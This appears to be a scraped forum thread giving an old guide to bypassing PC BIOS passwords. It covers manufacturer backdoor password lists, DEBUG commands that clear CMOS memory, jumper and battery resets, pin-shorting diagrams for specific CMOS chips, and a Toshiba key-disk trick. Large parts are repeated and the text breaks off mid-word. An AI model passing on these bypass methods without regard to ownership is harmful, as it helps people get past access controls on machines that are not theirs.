If you can't access the computer when it's on, and the standard backdoor passwords didn't work, you'll have to flash the BIOS via hardware. Please read the important notes at the end of this section before to try any of these methods.

Using the jumpers
The canonical way to flash the BIOS via hardware is to plug, unplug, or switch a jumper on the motherboard (for "switching a jumper" I mean that you find a jumper that joins the central pin and a side pin of a group of three pins, you should then unplug the jumper and then plug it to the central pin and to the pin on the opposite side, so if the jumper is normally on position 1-2, you have to put it on position 2-3, or vice versa). This jumper is not always located near to the BIOS, but could be anywhere on the motherboard.
To find the correct jumper you should read the motherboard's manual.
Once you've located the correct jumper, switch it (or plug or unplug it, depending from what the manual says) while the computer is turned OFF. Wait a couple of seconds then put the jumper back to its original position. In some motherboards it may happen that the computer will automatically turn itself on, after flashing the BIOS. In this case, turn it off, and put the jumper back to its original position, then turn it on again. Other motherboards require you turn the computer on for a few seconds to flash the BIOS.
If you don't have the motherboard's manual, you'll have to "brute force" it... trying out all the jumpers. In this case, try first the isolated ones (not in a group), the ones near to the BIOS, and the ones you can switch (as I explained before). If all them fail, try all the others. However, you must modify the status of only one jumper per attempt, otherwise you could damage the motherboard (since you don't know what the jumper you modified is actually meant for). If the password request screen still appear, try another one.
If after flashing the BIOS, the computer won't boot when you turn it on, turn it off, and wait some seconds before to retry.

Removing the battery
If you can't find the jumper to flash the BIOS or if such jumper doesn't exist, you can remove the battery that keeps the BIOS memory alive. It's a button-size battery somewhere on the motherboard (on elder computers the battery could be a small, typically blue, cylinder soldered to the motherboard, but usually has a jumper on its side to disconnect it, otherwise you'll have to unsolder it and then solder it back). Take it away for 15-30 minutes or more, then put it back and the data contained into the BIOS memory should be volatilized. I'd suggest you to remove it for about one hour to be sure, because if you put it back when the data aren't erased yet you'll have to wait more time, as you've never removed it. If at first it doesn't work, try to remove the battery overnight.
Important note: in laptop and notebooks you don't have to remove the computer's power batteries (which would be useless), but you should open your computer and remove the CMOS battery from the motherboard.

Short-circuiting the chip
Another way to clear the CMOS RAM is to reset it by short circuiting two pins of the BIOS chip for a few seconds. You can do that with a small piece of electric wire or with a bent paper clip. Always make sure that the computer is turned OFF before to try this operation.
Here is a list of EPROM chips that are commonly used in the BIOS industry. You may find similar chips with different names if they are compatible chips made by another brand. If you find the BIOS chip you are working on matches with one of the following you can try to short-circuit the appropriate pins. Be careful, because this operation may damage the chip.
CHIPS P82C206 (square)
Short together pins 12 and 32 (the first and the last pins on the bottom edge of the chip) or pins 74 and 75 (the two pins on the upper left corner).
gnd
74
|__________________
5v 75--| |
| |
| |
| CHIPS |
1 * | |
| P82C206 |
| |
| |
|___________________|
| |
| gnd | 5v
12 32
OPTi F82C206 (rectangular)
Short together pins 3 and 26 (third pin from left side and fifth pin from right side on the bottom edge).
80 51
|______________|
81 -| |- 50
| |
| |
| OPTi |
| |
| F82C206 |
| |
100-|________________|-31
|| | |
1 || | | 30
3 26

Dallas DS1287, DS1287A
Benchmarq bp3287MT, bq3287AMT
The Dallas DS1287 and DS1287A, and the compatible Benchmarq bp3287MT and bq3287AMT chips have a built-in battery. This battery should last up to ten years. Any motherboard using these chips should not have an additional battery (this means you can't flash the BIOS by removing a battery). When the battery fails, the RTC chip would be replaced.
CMOS RAM can be cleared on the 1287A and 3287AMT chips by shorting pins 12 and 21.
The 1287 (and 3287MT) differ from the 1287A in that the CMOS RAM can't be cleared. If there is a problem such as a forgotten password, the chip must be replaced. (In this case it is recommended to replace the 1287 with a 1287A). Also the Dallas 12887 and 12887A are similar but contain twice as much CMOS RAM storage.
__________
1 -| * U |- 24 5v
2 -| |- 23
3 -| |- 22
4 -| |- 21 RCL (RAM Clear)
5 -| |- 20
6 -| |- 19
7 -| |- 18
8 -| |- 17
9 -| |- 16
10 -| |- 15
11 -| |- 14
gnd 12 -|__________|- 13

NOTE: Although these are 24-pin chips,
the Dallas chips may be missing 5 pins,
these are unused pins.
Most chips have unused pins,
though usually they are still present.

Dallas DS12885S
Benchmarq bq3258S
Hitachi HD146818AP
Samsung KS82C6818A
This is a rectangular 24-pin DIP chip, usually in a socket. The number on the chip should end in 6818.
Although this chip is pin-compatible with the Dallas 1287/1287A, there is no built-in battery.
Short together pins 12 and 24.
5v
24 20 13
|___________|____________________|
| |
| DALLAS |
|> |
| DS12885S |
| |
|__________________________________|
| |
1 12
gnd

Motorola MC146818AP
Short pins 12 and 24. These are the pins on diagonally opposite corners - lower left and upper right. You might also try pins 12 and 20.
__________
1 -| * U |- 24 5v
2 -| |- 23
3 -| |- 22
4 -| |- 21
5 -| |- 20
6 -| |- 19
7 -| |- 18
8 -| |- 17
9 -| |- 16
10 -| |- 15
11 -| |- 14
gnd 12 -|__________|- 13

Replacing the chip
If nothing works, you could replace the existing BIOS chip with a new one you can buy from your specialized electronic shop or your computer supplier. It's a quick operation if the chip is inserted on a base and not soldered to the motherboard, otherwise you'll have to unsolder it and then put the new one. In this case would be more convenient to solder a base on which you'll then plug the new chip, in the eventuality that you'll have to change it again. If you can't find the BIOS chip specifically made for your motherboard, you should buy one of the same type (probably one of the ones shown above) and look in your motherboard manufacturer's website to see if there's the BIOS image to download. Then you should copy that image on the chip you bought with an EPROM programmer.

Important
Whether is the method you use, when you flash the BIOS not only the password, but also all the other configuration data will be reset to the factory defaults, so when you are booting for the first time after a BIOS flash, you should enter the CMOS configuration menu (as explained before) and fix up some things.
Also, when you boot Windows, it may happen that it finds some new device, because of the new configuration of the BIOS, in this case you'll probably need the Windows installation CD because Windows may ask you for some external files. If Windows doesn't see the CD-ROM try to eject and re-insert the CD-ROM again. If Windows can't find the CD-ROM drive and you set it properly from the BIOS config, just reboot with the reset key, and in the next run Windows should find it. However most files needed by the system while installing new hardware could also be found in C:WINDOWS, C:WINDOWSSYSTEM, or C:WINDOWSINF .

Key Disk for Toshiba laptops
Some Toshiba notebooks allow to bypass BIOS by inserting a "key-disk" in the floppy disk drive while booting. To create a Toshiba Keydisk, take a 720Kb or 1.44Mb floppy disk, format it (if it's not formatted yet), then use a hex editor such as Hex Workshop (***.bpsoft.com/downloads/index.html) to change the first five bytes of the second sector (the one after the boot sector) and set them to 4B 45 59 00 00 (note that the first three bytes are the ASCII for "KEY" followed by two zeroes). Once you have created the key disk put it into the notebook's drive and turn it on, then push the reset button and when asked for password, press Enter. You will be asked to Set Password again. Press Y and Enter. You'll enter the BIOS configuration where you can set a new password.

Key protected cases
A final note about those old computers (up to 486 and early Pentiums) protected with a key that prevented the use of the mouse and the keyboard or the power button. All you have to do with them is to follow the wires connected to the key hole, locate the jumper to which they are connected and unplug it.

Master
30-04-07, 04:50
READ EVEYTHING BEFORE YOU USE ANY METHOD LISTED BELOW

Basic BIOS password crack - works 9.9 times out of ten
This is a password hack but it clears the BIOS such that the next time you start the PC, the CMOS does not ask for any password. Now if you are able to bring the DOS prompt up, then you will be able to change the BIOS setting to the default. To clear the CMOS do the following:
Get DOS prompt and type:
DEBUG hit enter
-o 70 2e hit enter
-o 71 ff hit enter
-q hit enter
exit hit enter
Restart the computer. It works on most versions of the AWARD BIOS.



Accessing information on the hard disk
When you turn on the host machine, enter the CMOS setup menu (usually you have to press F2, or DEL, or CTRL+ALT+S during the boot sequence) and go to STANDARD CMOS SETUP, and set the channel to which you have put the hard disk as TYPE=Auto, MODE=AUTO, then SAVE & EXIT SETUP. Now you have access to the hard disk.

Standard BIOS backdoor passwords
The first, less invasive, attempt to bypass a BIOS password is to try on of these standard manufacturer's backdoor passwords:
AWARD BIOS
AWARD SW, AWARD_SW, Award SW, AWARD PW, _award, awkward, J64, j256, j262, j332, j322, 01322222, 589589, 589721, 595595, 598598, HLT, SER, SKY_FOX, aLLy, aLLY, Condo, CONCAT, TTPTHA, aPAf, HLT, KDD, ZBAAACA, ZAAADA, ZJAAADC, djonet, %ّهٌٍü ïpîلهëîâ%, %نهâےٍü ïpîلهëîâ%
AMI BIOS
AMI, A.M.I., AMI SW, AMI_SW, BIOS, PASSWORD, HEWITT RAND, Oder
Other passwords you may try (for AMI/AWARD or other BIOSes)
LKWPETER, lkwpeter, BIOSTAR, biostar, BIOSSTAR, biosstar, ALFAROME, Syxz, Wodj
Note that the key associated to "_" in the US keyboard corresponds to "?" in some European keyboards (such as Italian and German ones), so -- for example -- you should type AWARD?SW when using those keyboards. Also remember that passwords are Case Sensitive. The last two passwords in the AWARD BIOS list are in Russian.

Flashing BIOS via software
If you have access to the computer when it's turned on, you could try one of those programs that remove the password from the BIOS, by invalidating its memory.
However, it might happen you don't have one of those programs when you have access to the computer, so you'd better learn how to do manually what they do. You can reset the BIOS to its default values using the MS-DOS tool DEBUG (type DEBUG at the command prompt. You'd better do it in pure MS-DOS mode, not from a MS-DOS shell window in Windows). Once you are in the debug environment enter the following commands:
AMI/AWARD BIOS
O 70 17
O 71 17
Q
PHOENIX BIOS
O 70 FF
O 71 17
Q
GENERIC
Invalidates CMOS RAM.
Should work on all AT motherboards
(XT motherboards don't have CMOS)
O 70 2E
O 71 FF
Q
Note that the first letter is a "O" not the number "0". The numbers which follow are two bytes in hex format.

Flashing BIOS via hardware
If you can't access the computer when it's on, and the standard backdoor passwords didn't work, you'll have to flash the BIOS via hardware. Please read the important notes at the end of this section before to try any of these methods.

Using the jumpers
The canonical way to flash the BIOS via hardware is to plug, unplug, or switch a jumper on the motherboard (for "switching a jumper" I mean that you find a jumper that joins the central pin and a side pin of a group of three pins, you should then unplug the jumper and then plug it to the central pin and to the pin on the opposite side, so if the jumper is normally on position 1-2, you have to put it on position 2-3, or vice versa). This jumper is not always located near to the BIOS, but could be anywhere on the motherboard.
To find the correct jumper you should read the motherboard's manual.
Once you've located the correct jumper, switch it (or plug or unplug it, depending from what the manual says) while the computer is turned OFF. Wait a couple of seconds then put the jumper back to its original position. In some motherboards it may happen that the computer will automatically turn itself on, after flashing the BIOS. In this case, turn it off, and put the jumper back to its original position, then turn it on again. Other motherboards require you turn the computer on for a few seconds to flash the BIOS.
If you don't have the motherboard's manual, you'll have to "brute force" it... trying out all the jumpers. In this case, try first the isolated ones (not in a group), the ones near to the BIOS, and the ones you can switch (as I explained before). If all them fail, try all the others. However, you must modify the status of only one jumper per attempt, otherwise you could damage the motherboard (since you don't know what the jumper you modified is actually meant for). If the password request screen still appear, try another one.
If after flashing the BIOS, the computer won't boot when you turn it on, turn it off, and wait some seconds before to retry.

Removing the battery
If you can't find the jumper to flash the BIOS or if such jumper doesn't exist, you can remove the battery that keeps the BIOS memory alive. It's a button-size battery somewhere on the motherboard (on elder computers the battery could be a small, typically blue, cylinder soldered to the motherboard, but usually has a jumper on its side to disconnect it, otherwise you'll have to unsolder it and then solder it back). Take it away for 15-30 minutes or more, then put it back and the data contained into the BIOS memory should be volatilized. I'd suggest you to remove it for about one hour to be sure, because if you put it back when the data aren't erased yet you'll have to wait more time, as you've never removed it. If at first it doesn't work, try to remove the battery overnight.
Important note: in laptop and notebooks you don't have to remove the computer's power batteries (which would be useless), but you should open your computer and remove the CMOS battery from the motherboard.

Short-circuiting the chip
Another way to clear the CMOS RAM is to reset it by short circuiting two pins of the BIOS chip for a few seconds. You can do that with a small piece of electric wire or with a bent paper clip. Always make sure that the computer is turned OFF before to try this operation.
Here is a list of EPROM chips that are commonly used in the BIOS industry. You may find similar chips with different names if they are compatible chips made by another brand. If you find the BIOS chip you are working on matches with one of the following you can try to short-circuit the appropriate pins. Be careful, because this operation may damage the chip.
CHIPS P82C206 (square)
Short together pins 12 and 32 (the first and the last pins on the bottom edge of the chip) or pins 74 and 75 (the two pins on the upper left corner).
gnd
74
|__________________
5v 75--| |
| |
| |
| CHIPS |
1 * | |
| P82C206 |
| |
| |
|___________________|
| |
| gnd | 5v
12 32
OPTi F82C206 (rectangular)
Short together pins 3 and 26 (third pin from left side and fifth pin from right side on the bottom edge).
80 51
|______________|
81 -| |- 50
| |
| |
| OPTi |
| |
| F82C206 |
| |
100-|________________|-31
|| | |
1 || | | 30
3 26

Dallas DS1287, DS1287A
Benchmarq bp3287MT, bq3287AMT
The Dallas DS1287 and DS1287A, and the compatible Benchmarq bp3287MT and bq3287AMT chips have a built-in battery. This battery should last up to ten years. Any motherboard using these chips should not have an additional battery (this means you can't flash the BIOS by removing a battery). When the battery fails, the RTC chip would be replaced.
CMOS RAM can be cleared on the 1287A and 3287AMT chips by shorting pins 12 and 21.
The 1287 (and 3287MT) differ from the 1287A in that the CMOS RAM can't be cleared. If there is a problem such as a forgotten password, the chip must be replaced. (In this case it is recommended to replace the 1287 with a 1287A). Also the Dallas 12887 and 12887A are similar but contain twice as much CMOS RAM storage.
__________
1 -| * U |- 24 5v
2 -| |- 23
3 -| |- 22
4 -| |- 21 RCL (RAM Clear)
5 -| |- 20
6 -| |- 19
7 -| |- 18
8 -| |- 17
9 -| |- 16
10 -| |- 15
11 -| |- 14
gnd 12 -|__________|- 13

NOTE: Although these are 24-pin chips,
the Dallas chips may be missing 5 pins,
these are unused pins.
Most chips have unused pins,
though usually they are still present.

Dallas DS12885S
Benchmarq bq3258S
Hitachi HD146818AP
Samsung KS82C6818A
This is a rectangular 24-pin DIP chip, usually in a socket. The number on the chip should end in 6818.
Although this chip is pin-compatible with the Dallas 1287/1287A, there is no built-in battery.
Short together pins 12 and 24.
5v
24 20 13
|___________|____________________|
| |
| DALLAS |
|> |
| DS12885S |
| |
|__________________________________|
| |
1 12
gnd

Motorola MC146818AP
Short pins 12 and 24. These are the pins on diagonally opposite corners - lower left and upper right. You might also try pins 12 and 20.
__________
1 -| * U |- 24 5v
2 -| |- 23
3 -| |- 22
4 -| |- 21
5 -| |- 20
6 -| |- 19
7 -| |- 18
8 -| |- 17
9 -| |- 16
10 -| |- 15
11 -| |- 14
gnd 12 -|__________|- 13

Replacing the chip
If nothing works, you could replace the existing BIOS chip with a new one you can buy from your specialized electronic shop or your computer supplier. It's a quick operation if the chip is inserted on a base and not soldered to the motherboard, otherwise you'll have to unsolder it and then put the new one. In this case would be more convenient to solder a base on which you'll then plug the new chip, in the eventuality that you'll have to change it again. If you can't find the BIOS chip specifically made for your motherboard, you should buy one of the same type (probably one of the ones shown above) and look in your motherboard manufacturer's website to see if there's the BIOS image to download. Then you should copy that image on the chip you bought with an EPROM programmer.

Important
Whether is the method you use, when you flash the BIOS not only the password, but also all the other configuration data will be reset to the factory defaults, so when you are booting for the first time after a BIOS flash, you should enter the CMOS configuration menu (as explained before) and fix up some things.
Also, when you boot Windows, it may happen that it finds some new device, because of the new configuration of the BIOS, in this case you'll probably need the Windows installation CD because Windows may ask you for some external files. If Windows doesn't see the CD-ROM try to eject and re-insert the CD-ROM again. If Windows can't find the CD-ROM drive and you set it properly from the BIOS config, just reboot with the reset key, and in the next run Windows should find it. However most files needed by the system while installing new hardware could also be found in C:WINDOWS, C:WINDOWSSYSTEM, or C:WINDOWSINF .

Key Disk for Toshiba laptops
Some Toshiba notebooks allow to bypass BIOS by inserting a "key-disk" in the floppy disk drive while booting. To create a Toshiba Keydisk, take a 720Kb or 1.44Mb floppy disk, format it (if it's not formatted yet), then use a hex editor such as Hex Workshop (***.bpsoft.com/downloads/index.html) to change the first five bytes of the second sector (the one after the boot sector) and set them to 4B 45 59 00 00 (note that the first three bytes are the ASCII for "KEY" followed by two zeroes). Once you have created the key disk put it into the notebook's drive and turn it on, then push the reset button and when asked for password, press Enter. You will be asked to Set Password again. Press Y and Enter. You'll enter the BIOS configuration where you can set a new password.

Key pr